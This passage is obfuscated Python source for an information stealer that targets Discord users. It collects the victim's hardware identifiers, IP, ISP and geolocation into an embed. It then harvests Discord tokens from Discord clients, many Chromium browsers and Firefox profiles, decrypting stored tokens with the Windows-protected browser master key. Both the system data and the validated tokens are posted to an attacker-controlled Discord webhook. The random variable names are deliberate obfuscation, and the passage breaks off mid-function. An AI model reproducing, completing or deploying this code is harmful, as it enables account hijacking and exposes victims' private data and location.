Screen Number : {MXRRCDQKDYNDYHQXMUTQMURFFQEYIZXFUYIMJGBOKVXTVIIYPKFESUAPHIINOLXRDAVROQRJIVQEZKTDBDA}

HWID : {FVULYLKNGIGDNNUGEMYJABDZFJDOHBRTKWIPBSMDBTTDUHOLUJCLUJIMHOHOAFWMKYUHJQYTUN}
MAC  : {FTKILLPMTRPUDWZZRZDZAAWENZPNSLJRIYQMUBGDCHDWLLZTFOQARPFTLFPLVERBWAVKRXHWEKPPEHNKLZPTNKGLM}
CPU  : {PHLNRTBKMEOWWFWCPVTEFZOKXIWAPRUUNKPQEHRGLXEXLNSDIU}, {UAKZYEEOEXMQNOETSUROYXSBRJARYGHFHQPOUDJFPXTXKWUKOQDQGMRLSKKLEMNQYGHRCCCISFENRGGGW} Core
GPU  : {FRXUYGKVVAOPZHLPYAVCYKBDQBYYSYRKEUATOYWDVCOZQUNBCLPCWMPIKSJRROAIFUAQQMYSNRFMGKQWGVYECZLJ}
RAM  : {RIKUSLZSIPLBDJNJVSBYSERTALQOUROEGYBFJKFTVMUAGFJHKWUBFXUCNGGXHKNGY}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}
Local  : {MWQTHNPXSVMOTAARLDLWTDOCGKYIXQNSSVIBBYQDPQESRNRLBRJVBKBHKGGXDFDCFA}
Isp    : {PIWJARYRTXOUOYVTEDXOALCCXBDIFGTLMDUQUWRVXNRVAGPBJWTULGHMGJMWVPITIO}
Org    : {UPLLWFFTAHEZBZQCLMOVHXISLLDHCSHKTBYRKQRLLVBCHYPINBDCHBTXIMPABFDFDECVAKXCCIDQYFXNIJGFK}
As     : {AATFZJIOUEASHXACVDDBUGYWLIKXHVMGAFMQYGECVHRZQWKHNXFTXKJCPUAIDHMMHYEFLDRFCIUXXOXKSF}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{XOOGSAPEPHYVOLWSFKJOSITLNDRFJUQPDQPGLWNEPZZDRCXMZDHCAU}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {BAIUREXHIFHBVPBZJJSVGXJXKSNKELYOIRDVQCGZJXWZXPFNHRUHWKINZBUFFUKDCSFPXTANGYPQDCBCYXAVUHGQARJXJ} ({BAIUREXHIFHBVPBZJJSVGXJXKSNKELYOIRDVQCGZJXWZXPFNHRUHWKINZBUFFUKDCSFPXTANGYPQDCBCYXAVUHGQARJXJ_code})
Region    : {QVSNYTWMLIJZWHTGJSEDFJEWRJTVWPZKOMTFODGGVSUSUNHIJBUBBJZPKCIXUPAXAANGZEFQVIWXYEENYIEAZZ} ({QVSNYTWMLIJZWHTGJSEDFJEWRJTVWPZKOMTFODGGVSUSUNHIJBUBBJZPKCIXUPAXAANGZEFQVIWXYEENYIEAZZ_code})
Zip       : {DMMCXZGEITTGSEBQKBSDZPIUIGGMJUZPMYYPRRGUGDUYDVFMGYQYHCCMVVMNEBEE}
City      : {CODOHTDRUIZFIHFHZAENJYZJHXVZAWWELOVUPRQRWOHWXZYIESVXMHRLNQNSZKU}
Timezone  : {YUDKNJYZTTOSZWNJQGETDEZGREGEHRKJCFYIRPEGRBJLZBWEASGBIYBGWNOJZCFEMUJ}
Latitude  : {PYCECSBAUVTTNNWGWDALFGGDBUPATTNONFQDXBLDHBJVDGFTIKCZVKX}
Longitude : {NMVLFTVANAJRCERXXREDYVYRJFYFFFXQLNNGROFAFZRZZYYPFHNNYHEQEZYXKCQY}```""", inline=False)

    embed.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)

    w3bh00k = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)
    w3bh00k.send(embed=embed, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE = "https://discord.com/api/v9/users/@me"
        RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD = os.getenv("localappdata")
        GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX = os.getenv("appdata")
        UNZMAWESXQTTNKBRUGASCCLDMENZOVDSEGHDFFVPYCZCFFHTIGAMXLYPGAMVHRYXRDOIVKGWEVSPSHDNUC = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        UNZMAWESXQTTNKBRUGASCCLDMENZOVDSEGHDFFVPYCZCFFHTIGAMXLYPGAMVHRYXRDOIVKGWEVSPSHDNUC_enc = r"dQw4w9WgXcQ:[^\"]*"
        GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD = []
        QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK = []
        VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH = {}

        RNEEFIIBHUAIHUPQXKIWJOWBUKHFKWXWGZPYQWUVSCISRCEBTMJJYGBOWU = {
            'Discord': GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': RQIAMFGQQNFROZRHORIBETGHPUIWPMZVJJTCCWFKLHTRJOIGHKQYOKWTVJQBPKJZWGSDCMKXCD + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS, ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT in RNEEFIIBHUAIHUPQXKIWJOWBUKHFKWXWGZPYQWUVSCISRCEBTMJJYGBOWU.items():
            if not os.path.exists(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
                continue
            GGPGCZSSXSAMYXXEIENCYJPRSARZZMSLYFXDQDYZLPKZJSAVJLGIVSMDWAPLHWPAJTZI = IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS.replace(" ", "").lower()
            if "cord" in ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT:
                if not os.path.exists(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + f'\\{GGPGCZSSXSAMYXXEIENCYJPRSARZZMSLYFXDQDYZLPKZJSAVJLGIVSMDWAPLHWPAJTZI}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(UNZMAWESXQTTNKBRUGASCCLDMENZOVDSEGHDFFVPYCZCFFHTIGAMXLYPGAMVHRYXRDOIVKGWEVSPSHDNUC_enc, v4r_line.strip()):
                                LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + f'\\{GGPGCZSSXSAMYXXEIENCYJPRSARZZMSLYFXDQDYZLPKZJSAVJLGIVSMDWAPLHWPAJTZI}\\Local State'))
                                if validate_t0k3n(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU, SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE):
                                    LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL = requests.get(SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE, headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU}).json()['id']
                                    if LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL not in QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK:
                                        GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD.append(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU)
                                        QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK.append(LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL)
                                        VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH[LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU] = (IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS, f"{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU in re.findall(UNZMAWESXQTTNKBRUGASCCLDMENZOVDSEGHDFFVPYCZCFFHTIGAMXLYPGAMVHRYXRDOIVKGWEVSPSHDNUC, v4r_line.strip()):
                                if validate_t0k3n(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU, SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE):
                                    LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL = requests.get(SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE, headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU}).json()['id']
                                    if LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL not in QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK:
                                        GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD.append(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU)
                                        QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK.append(LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL)
                                        VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH[LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU] = (IOCFEYAFVHBLDKBMDLMKVEBCVCQZQNJVWLDQIZGYKDIALXAZSBNICDRMWLEFFSCZTZLJFUOZVYCSQDQHMYBQEUUYUEJZBXAS, f"{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\\{v4r_file_name}")

        if os.path.exists(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + "\\Mozilla\\Firefox\\Profiles"):
            for ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, _, v4r_files in os.walk(GQUMYEJGNMYUTYIZALHJBQPOWRREKJWCHODGCXJFVADOYNTHXLPNFYUUZKSBX + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU in re.findall(UNZMAWESXQTTNKBRUGASCCLDMENZOVDSEGHDFFVPYCZCFFHTIGAMXLYPGAMVHRYXRDOIVKGWEVSPSHDNUC, v4r_line.strip()):
                                    if validate_t0k3n(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU, SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE):
                                        LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL = requests.get(SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE, headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU}).json()['id']
                                        if LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL not in QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK:
                                            GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD.append(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU)
                                            QROLVBDYWQVKYDOSVRTXHEJSPGXQTYOOXGCAPDWBTKHLHFLJRQZFTMWVOCEUDK.append(LPZRBFEMBYDVYUVJPNCODFXCSTNQSEXBQDIYCJYYZJFPBUMOUWNRQDMYSXL)
                                            VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH[LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU] = ('Firefox', f"{ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT}\\{v4r__file}")
        return GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD, VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH

    def validate_t0k3n(LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU, SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE):
        return requests.get(SZHGOOYJFRONOVXCBCZZYLKGOYJPDIVMTUCISOEKDRLWHGETXFQBGGMGE, headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU}).status_code == 200

    def decrypt_val(YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW, ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM):
        v4r_iv = YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW[3:15]
        v4r_payload = YBXIZZPZADRHFPSAKDJRLGJLDSIKZVIWMECSNJUKQAFGAQERYRVCVAYFZVJRJJMWJENTVLPZYGNWBRWOW[15:]
        v4r_cipher = AES.new(ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
        if not os.path.exists(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT):
            return None
        with open(ROYFMAODWZDFKILIKPZOPUPSRZWWKHDXNPYBJDSYRVHABHSYLXDOPPWMOTIEAQQPYBAMQORTFTCOAUCYNVDT, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(ECDAKESJVCISSBKOCVSXASHXHBZNSVNIHJKOLIJJBDCGLCDTWM, None, None, None, 0)[1]

    def upload_t0k3n5():
        GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD, VAVFAHCIRCASTMIVBYEZKQBCRGIIHTQVPCPONOHPFNKXYGRVFILOHCZGOXOIAHGRFFSDXSZFITKNHHOOSSBUIUTH = extr4ct_t0k3n5()
        OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ = SyncWebhook.from_url(ONYWRDNCRNVXPCSLVPVRRLXRCHIURKBAWEVUCVMVJWIHXZHTFVAIMPY)

        if not GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD:
            DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH = Embed(
                title=f'Discord Token `{IYLIXKVCGUDPZHLSFUZKSXMGVRPOKCZDFNZNXAGZTQQIOZITUWLCRTFJBOJOZULBITCYM} "{IGZERTTOGBTIWPVPBNFUTCPQOBXEFRKVHQCHRCPWFQJCJAAYHAFBIFJNUXBBYVRUW}"`:', 
                description=f"No discord tokens found.",
                color=MFVRFIVOAXNHMQEZPNEJIQDVYWUQZEJIXCCRGPAYMGVQBEMKWHPGKIZXLEYTVSAYHIIIMAZBXKZPGINGACDLYGJNCGR)
            DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH.set_footer(text=RORCMKOVOJLBXVIZOVVHHXDWGQHBMFLSOGGMVGZGVEEASETDAG, icon_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
            OZBFZWMXYYZJWFNWSSUNLJGKJGNQPZGVLPKRQGDZGMGIHDBSEMCXCYTZCMZOFKDJGCMWKDRGOLGGFWGAVDDXMSTGPMMOWGHEZ.send(embed=DEWPXUBGKSKCHAMHKOMOFMERLDNQCOFJHOKLIGNYDOYQNZEGCPLNRJVWTWHDVH, username=IUWVUOULDCQPFUGBLWHMHSVAWLCMAYIIZVRTCGIGZVCRXNASJXPDIQQKHNUQQ, avatar_url=BKDVSINNJKGBUFDXGRCSVRZUIAVEJXZNRGLTDMWKUTXOPFUMDVJGMOKHQBUJDBDLTLURQNGMYLOGW)
            return
        
        for LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU_d15c0rd in GBJYNDUBEHBFEFSVQFGZMUVCHIOJNOTACAKVGDGKTJDSGYZWKXYTZVMLGKKMNGELWJSGHDQJAIWTCNYYMOOIWMTZPVDPJBD:
            PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': LLICLNKTCAHRADMDUQKZSJQUPSCOBLIOOJBYMMTLOPDOOKUSQENRIWIGBBZVEU_d15c0rd}).json()

            WDKZZMKOCDFYVBRYKRISJDUHBLWOZYIEHFPECTNPCHRZTZXJUQMHL = PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('username', "None") + '#' + PWHOXOMOATVWGVMJIFURHUOQSOOALTOOXQODDQFSBVGJVFYRPKOVCXMIZIGWAMUDEVONWVNZPGRIXKWDGVBIVP.get('discriminator', "None")
